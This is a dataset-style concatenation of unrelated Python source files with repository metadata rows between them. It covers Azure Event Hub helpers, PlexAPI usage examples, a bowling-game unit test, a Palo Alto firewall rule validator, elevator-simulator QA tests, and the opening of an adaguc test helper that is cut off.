        }

    def total(self):
        """Sum of item prices minus their discounts, rounded to cents."""
        total = 0.00
        for item in self.basket_items:
            total += item.product.price
            total -= item.discount
        return round(total, 2)
| 25.602564
| 75
| 0.598398
| 1,569
| 0.785679
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.2003
|
368cd8469f10de7f8f6761744b6f6540ed7865bd
| 649
|
py
|
Python
|
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# -----------------------------------------------------------------------------------
import asyncio
def get_running_loop():
    """Return the currently running event loop.

    Uses asyncio.get_running_loop on Python 3.7+, falling back to the
    private _get_running_loop on 3.5/3.6. Raises RuntimeError when no
    event loop is running.
    """
    getter = getattr(asyncio, 'get_running_loop', None)
    if getter is not None:  # Python 3.7+
        return getter()
    # 3.5 / 3.6 fallback: the private helper returns None instead of raising.
    loop = asyncio._get_running_loop()  # pylint: disable=protected-access
    if loop is None:
        raise RuntimeError('No running event loop')
    return loop
| 38.176471
| 94
| 0.49923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.616333
|
368d248443117fe64f685790a5bf178a4f08ad05
| 4,409
|
py
|
Python
|
tools/examples.py
|
Hellowlol/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 4
|
2016-11-18T07:01:03.000Z
|
2018-05-03T07:45:36.000Z
|
tools/examples.py
|
phongsathorn2540/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 1
|
2016-12-06T15:03:09.000Z
|
2016-12-06T15:03:09.000Z
|
tools/examples.py
|
Hellowlol/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 4
|
2018-01-04T20:15:26.000Z
|
2021-01-26T20:32:28.000Z
|
# -*- coding: utf-8 -*-
"""
PlexAPI Examples
As of Plex version 0.9.11 I noticed that you must be logged in
to browse even the plex server locatewd at localhost. You can
run this example suite with the following command:
>> python examples.py -u <USERNAME> -p <PASSWORD> -s <SERVERNAME>
"""
import argparse, sys
from collections import defaultdict
from os.path import dirname, abspath
sys.path.append(dirname(dirname(abspath(__file__))))
from utils import fetch_server, iter_tests, register
@register()
def list_unwatched_movies(plex):
    """ Example 1: List all unwatched movies. """
    section = plex.library.section('Movies')
    # Newest additions first, capped at ten titles.
    for video in section.search(unwatched=True, maxresults=10, sort='addedAt:desc'):
        print(' %s' % video.title)
@register()
def mark_all_friends_episodes_watched(plex):
    """ Example 2: Mark all Friends episodes watched. """
    # markWatched on the show applies to every episode.
    plex.library.section('TV Shows').get('Friends').markWatched()
@register()
def list_connected_clients(plex):
    """ Example 3: List clients connected to the server. """
    # Print each connected client's display name.
    for connected in plex.clients():
        print(connected.title)
@register()
def play_avatar_on_client(plex):
    """ Example 4: Play the Movie Avatar on my iPhone.
        Note: Client must be on same network as server.
    """
    movie = plex.library.section('Movies').get('Avatar')
    target = plex.client('iphone-mike')
    target.playMedia(movie)
@register()
def list_animated_movies(plex):
    """ Example 5: List all animated movies from the 90s. """
    section = plex.library.section('Movies')
    for video in section.search(genre='animation', decade=1990):
        print(' %s (%s)' % (video.title, video.year))
@register()
def follow_the_talent(plex):
    """ Example 6: List all movies directed by the same person as Jurassic Park. """
    section = plex.library.section('Movies')
    directors = section.get('Jurassic Park').directors
    for movie in section.search(director=directors):
        print(movie.title)
@register()
def list_files(plex):
    """ Example 7: List files for the latest episode of Friends. """
    # episodes() is ordered, so the last entry is the most recent one.
    latest = plex.library.section('TV Shows').get('Friends').episodes()[-1]
    for part in latest.iterParts():
        print(part.file)
@register()
def get_stream_url(plex):
    """ Example 8: Get a URL you can open in VLC, MPV, etc. """
    movie = plex.library.section('Movies').get('Jurassic Park')
    print('Try running the following command:')
    print('vlc "%s"' % movie.getStreamURL(videoResolution='800x600'))
@register()
def most_streamed_titles(plex):
    """ Example 9: List the most played movies. """
    play_counts = defaultdict(int)
    for entry in plex.history():
        if entry.TYPE == 'movie':
            play_counts[entry.title] += 1
    ranked = sorted(play_counts.items(), key=lambda pair: pair[1], reverse=True)
    for title, count in ranked[:5]:
        print('%s (%s plays)' % (title, count))
@register()
def most_active_users(plex):
    """ Example 10: List the most active users. """
    users = defaultdict(int)
    for item in plex.history():
        # Count one play per history entry for its user. (A stray debug
        # print(item.TYPE) was removed here; Example 9 has no such output.)
        users[item.username] += 1
    users = sorted(users.items(), key=lambda x: x[1], reverse=True)
    for user, count in users[:5]:
        print('%s (%s plays)' % (user, count))
if __name__ == '__main__':
    # There are three ways to authenticate:
    # 1. If the server is running on localhost, just run without any auth.
    # 2. Pass in --username, --password, and --resource.
    # 3. Pass in --baseurl, --token
    parser = argparse.ArgumentParser(description='Run PlexAPI examples.')
    parser.add_argument('-u', '--username', help='Username for your MyPlex account.')
    parser.add_argument('-p', '--password', help='Password for your MyPlex account.')
    parser.add_argument('-r', '--resource', help='Name of the Plex resource (requires user/pass).')
    parser.add_argument('-b', '--baseurl', help='Baseurl needed for auth token authentication')
    parser.add_argument('-t', '--token', help='Auth token (instead of user/pass)')
    parser.add_argument('-q', '--example', help='Only run the specified example.')
    parser.add_argument('-v', '--verbose', default=False, action='store_true', help='Print verbose logging.')
    args = parser.parse_args()
    # fetch_server (defined elsewhere in this file) resolves whichever auth
    # method was supplied into a connected server + account pair.
    plex, account = fetch_server(args)
    # Run every registered example, or only the one named by --example.
    for example in iter_tests(args.example):
        example['func'](plex)
| 36.139344
| 109
| 0.6709
| 0
| 0
| 0
| 0
| 2,764
| 0.6269
| 0
| 0
| 1,784
| 0.404627
|
368eabb014f813c693697e1b58b1279e93227806
| 1,070
|
py
|
Python
|
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | 2
|
2019-06-17T03:31:13.000Z
|
2019-06-17T03:31:16.000Z
|
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | null | null | null |
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 - hongzhi.wang <hongzhi.wang@moji.com>
'''
Author: hongzhi.wang
Create Date: 2019-09-04
Modify Date: 2019-09-04
'''
import unittest
from .bowling_game import BowlingGame
class TestBowlingGame(unittest.TestCase):
    """Unit tests for BowlingGame scoring."""

    def setUp(self):
        # A fresh game instance for every test case.
        self.g = BowlingGame()

    def test_game_all_zero(self):
        # Gutter game: 20 rolls of 0 pins scores 0.
        self.roll_many(20, 0)
        self.assertEqual(0, self.g.score())

    def test_game_all_one(self):
        # 20 rolls of 1 pin: no spares or strikes, score is the plain sum (20).
        self.roll_many(20, 1)
        self.assertEqual(20, self.g.score())

    def roll_many(self, times, pin):
        # Helper (not a test): roll the same pin count `times` times.
        for i in range(times):
            self.g.roll(pin)

    def test_game_first_strike(self):
        # NOTE(review): 4 then 6 is a SPARE, not a strike - the method name
        # looks misleading. Expected: (10 + 1 bonus) + 18 ones = 29.
        self.g.roll(4)
        self.g.roll(6)
        self.roll_many(18, 1)
        self.assertEqual(29, self.g.score())

    def test_perfect_game(self):
        # 12 consecutive strikes score the maximum 300.
        self.roll_many(12, 10)
        self.assertEqual(300, self.g.score())

    def test_game_first_two_strike(self):
        # NOTE(review): four rolls of 5 are two SPARES, not strikes.
        # Expected: (10 + 5 bonus) + (10 + 1 bonus) + 16 ones = 42.
        self.roll_many(4, 5)
        self.roll_many(16, 1)
        self.assertEqual(42, self.g.score())
| 23.777778
| 60
| 0.626168
| 828
| 0.773832
| 0
| 0
| 0
| 0
| 0
| 0
| 180
| 0.168224
|
368f64f73686f6ce0d3e038e0daaf52552b9013c
| 1,873
|
py
|
Python
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 4
|
2021-03-06T05:57:29.000Z
|
2022-03-11T07:10:41.000Z
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 24
|
2021-03-05T04:53:46.000Z
|
2022-03-22T15:51:12.000Z
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 1
|
2021-03-05T16:41:52.000Z
|
2021-03-05T16:41:52.000Z
|
from palo_alto_firewall_analyzer.core import register_policy_validator, BadEntry
@register_policy_validator("BadGroupProfile", "Rule uses an incorrect group profile")
def find_bad_group_profile_setting(profilepackage):
device_groups = profilepackage.device_groups
devicegroup_exclusive_objects = profilepackage.devicegroup_exclusive_objects
allowed_group_profiles = profilepackage.allowed_group_profiles
if not allowed_group_profiles:
return []
badentries = []
print("*"*80)
print("Checking for incorrect group profile")
for i, device_group in enumerate(device_groups):
for ruletype in ('SecurityPreRules', 'SecurityPostRules'):
rules = devicegroup_exclusive_objects[device_group][ruletype]
print (f"({i+1}/{len(device_groups)}) Checking {device_group}'s {ruletype}")
for entry in rules:
# Disabled rules can be ignored
if entry.find("./disabled") is not None and entry.find("./disabled").text == "yes":
continue
rule_name = entry.get('name')
group_profile_setting_node = entry.find("./profile-setting/group/member")
if group_profile_setting_node is not None:
group_profile_setting = group_profile_setting_node.text
else:
group_profile_setting = ""
if group_profile_setting not in allowed_group_profiles:
text = f"Device Group {device_group}'s {ruletype} '{rule_name}' doesn't use an approved group " \
f"profile '{allowed_group_profiles}', instead it uses '{group_profile_setting}' "
print (text)
badentries.append( BadEntry(data=entry, text=text, device_group=device_group, entry_type=ruletype) )
return badentries
| 45.682927
| 120
| 0.657234
| 0
| 0
| 0
| 0
| 1,790
| 0.955686
| 0
| 0
| 470
| 0.250934
|
3690831885f4829c3bfb3701534068309447ba6f
| 15,574
|
py
|
Python
|
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
qa test for elevators
Authors: likejiao(likejiao@baidu.com)
Date: 2019/06/16 19:30:16
"""
import sys
import time
import copy
import traceback
from metagym.liftsim.environment.env import LiftSim
from metagym.liftsim.environment.mansion.person_generators.generator_proxy import PersonGenerator
from metagym.liftsim.environment.mansion.mansion_config import MansionConfig
from metagym.liftsim.environment.mansion.utils import ElevatorState, MansionState, ElevatorAction
from metagym.liftsim.environment.mansion.mansion_manager import MansionManager
from rule_benchmark.dispatcher import Rule_dispatcher
fail_flag = False
stop_count = 10
def state_check(state, next_state, action):
    """Assert invariants on one simulator transition (state -> next_state under action).

    Checks, per elevator: attribute types, value ranges, intra-state relations
    (doors vs velocity vs load), and state-to-next-state dynamics. On the first
    failed assertion it prints a diagnostic and sets the global fail_flag;
    after `stop_count` further failing calls the process exits.
    """
    global fail_flag
    global stop_count
    try:
        assert isinstance(state, MansionState)
        # for e in state.ElevatorStates:
        for i in range(len(state.ElevatorStates)):
            # Deep copies so the printed diagnostics are not mutated later.
            ele = copy.deepcopy(state.ElevatorStates[i])
            assert isinstance(ele, ElevatorState)
            next_ele = copy.deepcopy(next_state.ElevatorStates[i])
            assert isinstance(next_ele, ElevatorState)
            act = copy.deepcopy(action[i])
            assert isinstance(act, ElevatorAction)
            # type
            ele_Floor = ele.Floor
            ele_Velocity = ele.Velocity
            ele_LoadWeight = ele.LoadWeight
            next_ele_Floor = next_ele.Floor
            next_ele_Velocity = next_ele.Velocity
            next_ele_LoadWeight = next_ele.LoadWeight
            assert isinstance(ele_Floor, float)
            assert isinstance(ele.MaximumFloor, int)
            assert isinstance(ele_Velocity, float)
            assert isinstance(ele.MaximumSpeed, float)
            assert isinstance(ele.Direction, int)
            assert isinstance(ele.CurrentDispatchTarget, int)
            assert isinstance(ele.DispatchTargetDirection, int)
            assert isinstance(ele_LoadWeight, float)
            assert isinstance(ele.MaximumLoad, int)
            assert isinstance(ele.OverloadedAlarm, float)
            assert isinstance(ele.DoorIsOpening, bool)
            assert isinstance(ele.DoorIsClosing, bool)
            assert isinstance(ele.ReservedTargetFloors, list)
            # change: round to 2 decimals to avoid float-noise failures below
            ele_Floor = round(ele_Floor, 2)
            ele_Velocity = round(ele_Velocity, 2)
            ele_LoadWeight = round(ele_LoadWeight, 2)
            next_ele_Velocity = round(next_ele_Velocity, 2)
            ele_Velocity = round(ele_Velocity, 2)
            next_ele_LoadWeight = round(next_ele_LoadWeight, 2)
            # range
            assert ele_Floor > 0 and ele_Floor <= ele.MaximumFloor
            assert ele_Velocity >= (0 - ele.MaximumSpeed) and ele_Velocity <= ele.MaximumSpeed
            assert ele.Direction in [-1, 0, 1]
            assert ele.CurrentDispatchTarget >= -1 and ele.CurrentDispatchTarget <= ele.MaximumFloor
            assert ele.DispatchTargetDirection in [-1, 1]
            assert ele_LoadWeight >= 0 and ele_LoadWeight <= ele.MaximumLoad
            assert ele.OverloadedAlarm >= 0 and ele.OverloadedAlarm <= 2.0
            assert ele.DoorState >= 0 and ele.DoorState <= 1
            assert ele.DoorIsClosing in [True, False]
            assert ele.DoorIsOpening in [True, False]
            for t in ele.ReservedTargetFloors:
                assert t >= 1 and t <= ele.MaximumFloor
            #relation: consistency between doors, velocity, load and direction
            if(ele_Velocity == 0 and ele.Direction != 0):
                assert (ele_Floor % 1) == 0 or \
                    (ele_Floor % 1 != 0 and next_ele.Direction == 0)
            if(round(ele_Floor, 1) % 1 != 0 and ele.Direction != 0):
                assert ele_Velocity != 0 or next_ele_Velocity != 0 or\
                    next_ele.Direction == 0 or ele_Floor == ele.CurrentDispatchTarget
            assert (ele.DoorIsClosing and ele.DoorIsOpening) == False
            if(ele.DoorState < 1 and ele.DoorState > 0):
                # A partially-open door implies the cab is aligned with a floor.
                assert (ele.DoorIsClosing or ele.DoorIsOpening) == True
                assert ele_Floor % 1 == 0
            # if(ele.DoorState in [0.0, 1.0]):
            #     assert (ele.DoorIsClosing or ele.DoorIsOpening) == False # ignore
            if(ele.DoorState in [0.0, 1.0]):
                if((ele.DoorIsClosing or ele.DoorIsOpening) == True):
                    if(next_ele.DoorState in [0.0, 1.0]):
                        assert (next_ele.DoorIsClosing or next_ele.DoorIsOpening) == False
            if((ele_Floor % 1 != 0) or ((ele.DoorIsClosing and ele.DoorIsOpening) == True)):
                assert ele.DoorState == 0.0
                assert ele.DoorIsClosing == False or next_ele.DoorIsClosing == False
                assert ele.DoorIsOpening == False
            if(ele_Velocity != 0.0 and ele.Direction != 0):
                assert ele.DoorState == 0.0
            if(ele_Velocity != 0.0 and len(ele.ReservedTargetFloors) > 0):
                assert ele_LoadWeight > 0
            if(ele_Velocity != 0.0 and ele_LoadWeight > 0):
                assert len(ele.ReservedTargetFloors) > 0
            if(next_ele.OverloadedAlarm > 0 and ele.OverloadedAlarm == 0):
                # Alarm may only turn on near the weight limit (within 200 of max).
                assert next_ele_LoadWeight >= ele.MaximumLoad - 200
            if(len(ele.ReservedTargetFloors) != 0):
                assert ele_LoadWeight >= 20
            # dynamic check: movement direction must agree with velocity sign
            delta_Floor = round(next_ele_Floor - ele_Floor, 2)
            assert delta_Floor * next_ele_Velocity >= 0 or delta_Floor * ele_Velocity >= 0
            target_list = ele.ReservedTargetFloors[:]
            # if(ele.CurrentDispatchTarget != 0):
            #     target_list.append(ele.CurrentDispatchTarget)
            if(delta_Floor > 0 and ele_Velocity != 0.0 and ele_Floor % 1 != 0): # going up
                min_target = min(target_list) if len(target_list) > 0 else ele.MaximumFloor + 1
                assert ele_Floor <= min_target
                assert next_ele_Velocity > 0 or ele_Velocity > 0 or ele.Direction == 0
            if(delta_Floor < 0 and ele_Velocity != 0.0 and ele_Floor % 1 != 0): # going down
                max_target = max(target_list) if len(target_list) > 0 else 0
                assert ele_Floor >= max_target
                assert next_ele_Velocity < 0 or ele_Velocity < 0 or ele.Direction == 0
            # if(delta_Floor == 0):
            #     assert next_ele_Velocity == 0 or ele_Velocity * next_ele_Velocity <= 0
            # Load may only change while the door is open or moving.
            if((next_ele_LoadWeight - ele_LoadWeight) > 0.01):
                assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
            if((next_ele_LoadWeight - ele_LoadWeight) < -0.01):
                assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
            if(ele.OverloadedAlarm < next_ele.OverloadedAlarm):
                assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
                assert len(next_ele.ReservedTargetFloors) == len(ele.ReservedTargetFloors) #?????
                # assert next_ele_LoadWeight >= ele_LoadWeight # not right
            if(len(next_ele.ReservedTargetFloors) > len(ele.ReservedTargetFloors)):
                assert (next_ele_LoadWeight - ele_LoadWeight) >= 0 #!!!
                assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
            if(len(next_ele.ReservedTargetFloors) < len(ele.ReservedTargetFloors)):
                # assert (next_ele_LoadWeight - ele_LoadWeight) < 0 # not right
                assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
            # if(ele.OverloadedAlarm > 0):
            #     assert ele.ReservedTargetFloors == next_ele.ReservedTargetFloors
            #     assert ele_LoadWeight == next_ele_LoadWeight
            #     assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
            if(fail_flag):
                # Allow a few more steps after the first failure, then abort.
                stop_count -= 1
                if(stop_count == 0):
                    print('\n\nSome error appear before several steps, please check\n\n')
                    exit(1)
    except AssertionError:
        _, _, tb = sys.exc_info()
        traceback.print_tb(tb) # Fixed format
        tb_info = traceback.extract_tb(tb)
        filename, line, func, text = tb_info[-1]
        print('An error occurred on line {} in statement {}'.format(line, text))
        print('\n========================== ele num: ', i)
        print('\nlast: ', ele)
        print('\nthis: ', next_ele)
        print('\n========================== please check\n\n')
        fail_flag = True
def print_state(state, action):
    """Print one tabular row per elevator (0-based index) plus the pending
    up/down hall-call floors for the whole mansion."""
    assert isinstance(state, MansionState)
    print('Num\tact\tact.dir\tFloor\t\tMaxF\tV\t\tMaxV\tDir\tTarget\tTDir\tLoad\tMaxL\tOver\tDoor\topening\tclosing\tReservedTargetFloors')
    # Bug fix: removed the dead 'i = 0' before the loop and the no-op 'i += 1'
    # at the end of the body (the loop variable is reassigned each iteration,
    # so neither had any effect on the output).
    for i in range(len(state.ElevatorStates)):
        ele = state.ElevatorStates[i]
        act = action[i]
        assert isinstance(ele, ElevatorState)
        assert isinstance(act, ElevatorAction)
        print(i,"\t|",act.TargetFloor,"\t|",act.DirectionIndicator,"\t|",
            '%2.4f'%ele.Floor,"\t|",ele.MaximumFloor,"\t|",
            '%2.7f'%ele.Velocity,"\t|",ele.MaximumSpeed,"\t|",
            ele.Direction,"\t|",ele.CurrentDispatchTarget,"\t|",ele.DispatchTargetDirection,"\t|",
            int(ele.LoadWeight),"\t|",ele.MaximumLoad,"\t|",'%.2f'%ele.OverloadedAlarm,"\t|",
            ele.DoorState,"\t|",int(ele.DoorIsOpening),"\t|",int(ele.DoorIsClosing),"\t|",ele.ReservedTargetFloors)
    print('------------------RequiringUpwardFloors', state.RequiringUpwardFloors)
    print('------------------RequiringDownwardFloors', state.RequiringDownwardFloors)
    print('')
def print_next_state(state):
    # Same tabular dump as print_state but without action columns.
    # NOTE(review): 'i += 1' runs BEFORE the print here, so elevators are
    # numbered 1..N, while print_state numbers them 0..N-1 - confirm intended.
    assert isinstance(state, MansionState)
    print('Num\tact\tact.dir\tFloor\t\tMaxF\tV\tMaxV\tDir\tTarget\tTDir\tLoad\tMaxL\tOver\tDoor\topening\tclosing\tRT')
    i = 0
    for i in range(len(state.ElevatorStates)):
        ele = state.ElevatorStates[i]
        # act = action[i]
        assert isinstance(ele, ElevatorState)
        # assert isinstance(act, ElevatorAction)
        i += 1
        print(i,"\t|",' ',"\t|",' ',"\t|",
            '%.2f'%ele.Floor,"\t|",ele.MaximumFloor,"\t|",
            '%.1f'%ele.Velocity,"\t|",ele.MaximumSpeed,"\t|",
            ele.Direction,"\t|",ele.CurrentDispatchTarget,"\t|",ele.DispatchTargetDirection,"\t|",
            '%.1f'%ele.LoadWeight,"\t|",ele.MaximumLoad,"\t|",ele.OverloadedAlarm,"\t|",
            ele.DoorState,"\t|",int(ele.DoorIsOpening),"\t|",int(ele.DoorIsClosing),"\t|",ele.ReservedTargetFloors)
    print('------------------RequiringUpwardFloors', state.RequiringUpwardFloors)
    print('------------------RequiringDownwardFloors', state.RequiringDownwardFloors)
    print('')
    # time.sleep(2)
def run_mansion_main(mansion_env, policy_handle, iteration):
    """Drive the environment for `iteration` steps with the given policy,
    printing each state and running state_check on every transition."""
    last_state = mansion_env.reset()
    # policy_handle.link_mansion(mansion_env.attribute)
    # policy_handle.load_settings()
    i = 0
    acc_reward = 0.0
    # = copy.deepcopy(mansion_env.state)
    while i < iteration:
        i += 1
        # state = mansion_env.state
        action = policy_handle.policy(last_state)
        state, r, _, _ = mansion_env.step(elevatoraction_to_list(action))
        # output_info = policy_handle.feedback(last_state, action, r)
        acc_reward += r
        # if(isinstance(output_info, dict) and len(output_info) > 0):
        #     mansion_env.log_notice("%s", output_info)
        # Report the accumulated reward once per simulated hour (3600 steps).
        # NOTE(review): print() with positional args does not interpolate the
        # %-placeholders - this literally prints the format string then the
        # values; verify whether a logger call was intended.
        if(i % 3600 == 0):
            print(
                "Accumulated Reward: %f, Mansion Status: %s",
                acc_reward, mansion_env.statistics)
            acc_reward = 0.0
        print_state(state, action)
        print('reward: %f' % r)
        state_check(last_state, state, action)
        # Keep a copy so state_check compares against the pre-step snapshot.
        last_state = copy.deepcopy(state)
# run main program with args
def run_qa_test(configfile, iterations, controlpolicy, set_seed=None):
    """Run a full QA pass of the LiftSim environment under the given policy.

    Args:
        configfile: path to the .ini configuration for the simulator.
        iterations: total number of simulation steps to run.
        controlpolicy: dispatcher type; only 'rule_benchmark' is implemented.
        set_seed: optional int seed for a deterministic run.

    Returns:
        0 on completion.

    Raises:
        ValueError: if controlpolicy names an unsupported dispatcher.
    """
    print('configfile:', configfile)  # configuration file for running elevators
    print('iterations:', iterations)  # total number of iterations
    print('controlpolicy:', controlpolicy)  # policy type: rule_benchmark or others
    mansion_env = LiftSim(configfile)
    if set_seed:
        mansion_env.seed(set_seed)
    if controlpolicy == 'rule_benchmark':
        dispatcher = Rule_dispatcher(mansion_env, iterations)
    else:
        # Bug fix: 'rl_benchmark' (and any unknown policy) previously fell
        # through with 'dispatcher' unbound, crashing below with a confusing
        # NameError instead of a clear error message.
        raise ValueError('unsupported controlpolicy: %s' % controlpolicy)
    run_mansion_main(mansion_env, dispatcher, iterations)
    return 0
def run_time_step_abnormal_test(configfile, iterations, controlpolicy, set_seed=None):
    """Expect run_qa_test to trip an AssertionError for an abnormal config.

    Passes when the expected AssertionError is raised; fails loudly otherwise.
    """
    try:
        run_qa_test(configfile, iterations, controlpolicy, set_seed=set_seed)
    except AssertionError:
        print('run_time_step_abnormal_test pass')
    else:
        # Bug fix: previously a run that raised nothing finished silently and
        # looked like a pass; mirror run_action_abnormal_test's explicit
        # failure path instead.
        print('run_time_step_abnormal_test fail')
        assert False
def run_action_abnormal_test(action_target_floor, action_target_direction, set_seed):
    """Feed a deliberately invalid action to every elevator and require the
    environment to reject it with an AssertionError."""
    passed_unexpectedly = True
    try:
        env = LiftSim()
        if set_seed:
            env.seed(set_seed)
        state = env.reset()
        action = [ElevatorAction(action_target_floor, action_target_direction) for _ in range(4)]
        next_state, reward, _, _ = env.step(elevatoraction_to_list(action))
    except AssertionError:
        # The environment rejected the malformed action, as desired.
        passed_unexpectedly = False
        print('abnormal action: ', action_target_floor, type(action_target_floor), action_target_direction, type(action_target_direction))
        print('run_action_abnormal_test pass')
    if passed_unexpectedly:
        # The malformed action slipped through - report and fail hard.
        print('abnormal action: ', action_target_floor, type(action_target_floor), action_target_direction, type(action_target_direction))
        print('run_action_abnormal_test fail')
        assert False
def elevatoraction_to_list(action):
    """Flatten action objects into [floor0, dir0, floor1, dir1, ...],
    reading each item's TargetFloor and DirectionIndicator in order."""
    flattened = []
    for item in action:
        flattened.extend((item.TargetFloor, item.DirectionIndicator))
    return flattened
if __name__ == "__main__":
    # Optional single CLI argument: an integer seed for deterministic runs.
    if (len(sys.argv) == 2):
        set_seed = int(sys.argv[1])
    else:
        set_seed = None
    # A config with time_step > 1 must trip the simulator's own assertions.
    run_time_step_abnormal_test('metagym/liftsim/tests/conf/config_time_step_more_than_1.ini', 100, 'rule_benchmark', set_seed)
    # Invalid actions (bad floor/direction values and types) must be rejected.
    run_action_abnormal_test(-2, 1, set_seed)
    run_action_abnormal_test(10000, -1, set_seed)
    run_action_abnormal_test(5.0, 1, set_seed)
    run_action_abnormal_test('5', 1, set_seed)
    run_action_abnormal_test(5, 4, set_seed)
    run_action_abnormal_test(5, '-1', set_seed)
    # Full simulations across a range of building configurations.
    run_qa_test('metagym/liftsim/config.ini', 4000, 'rule_benchmark', set_seed)
    run_qa_test('metagym/liftsim/tests/conf/config1.ini', 4000, 'rule_benchmark', set_seed) # 1 elevator
    run_qa_test('metagym/liftsim/tests/conf/config2.ini', 4000, 'rule_benchmark', set_seed) # 100 floors 20 elevator 0.3 time_step
    run_qa_test('metagym/liftsim/tests/conf/config3.ini', 4000, 'rule_benchmark', set_seed) # quick person generator
    run_qa_test('metagym/liftsim/tests/conf/config4.ini', 4000, 'rule_benchmark', set_seed) # 1.0 time_step
| 46.35119
| 139
| 0.634134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,534
| 0.226917
|
3690bf8c18ffa504f4805314fbdcb1e3b4e103df
| 4,955
|
py
|
Python
|
tests/AdagucTests/AdagucTestTools.py
|
lukas-phaf/adaguc-server
|
aa5e267d6c5c15463035ff87d353707207374d1b
|
[
"Apache-2.0"
] | 1
|
2019-08-21T11:03:09.000Z
|
2019-08-21T11:03:09.000Z
|
tests/AdagucTests/AdagucTestTools.py
|
ernstdevreede/adaguc-server
|
3516bf1a2ea6abb4f2e85e72944589dfcc990f7c
|
[
"Apache-2.0"
] | null | null | null |
tests/AdagucTests/AdagucTestTools.py
|
ernstdevreede/adaguc-server
|
3516bf1a2ea6abb4f2e85e72944589dfcc990f7c
|
[
"Apache-2.0"
] | null | null | null |
import os
from io import BytesIO
import shutil
from adaguc.CGIRunner import CGIRunner
from lxml import etree
from lxml import objectify
import re
ADAGUC_PATH = os.environ['ADAGUC_PATH']
class AdagucTestTools:
    """Helpers for adaguc-server integration tests: running the CGI binary,
    reading its log file, managing the temp dir and comparing
    GetCapabilities XML documents."""

    def getLogFile(self):
        """Return the contents of $ADAGUC_LOGFILE, or "" when unreadable."""
        ADAGUC_LOGFILE = os.environ['ADAGUC_LOGFILE']
        try:
            # Bug fix: use 'with' so the handle is closed even if read() fails
            # (the original opened/closed manually and leaked on error), and
            # catch OSError instead of a bare 'except:'.
            with open(ADAGUC_LOGFILE) as f:
                return f.read()
        except OSError:
            # The log may not exist yet (server never started); treat as empty.
            return ""

    def printLogFile(self):
        """Dump the ADAGUC log file to stdout between marker lines."""
        # (Removed an unused local that re-read ADAGUC_LOGFILE from the env.)
        print("\n=== START ADAGUC LOGS ===")
        print(self.getLogFile())
        print("=== END ADAGUC LOGS ===")

    def runADAGUCServer(self, url=None, env=[], path=None, args=None, isCGI=True, showLogOnError=True, showLog=False):
        """Run the adagucserver binary through CGIRunner.

        Returns [status, filetogenerate, headers] where filetogenerate is a
        BytesIO holding the response body. On failure (or when showLog is set)
        the server log, headers and exit diagnostics are printed.

        NOTE(review): the mutable default 'env=[]' is kept for signature
        compatibility; it is only read here, never mutated.
        """
        adagucenv = os.environ.copy()
        adagucenv.update(env)
        ADAGUC_PATH = adagucenv['ADAGUC_PATH']
        ADAGUC_LOGFILE = os.environ['ADAGUC_LOGFILE']
        # Start from a clean log so diagnostics only show this run's output.
        try:
            os.remove(ADAGUC_LOGFILE)
        except OSError:
            pass
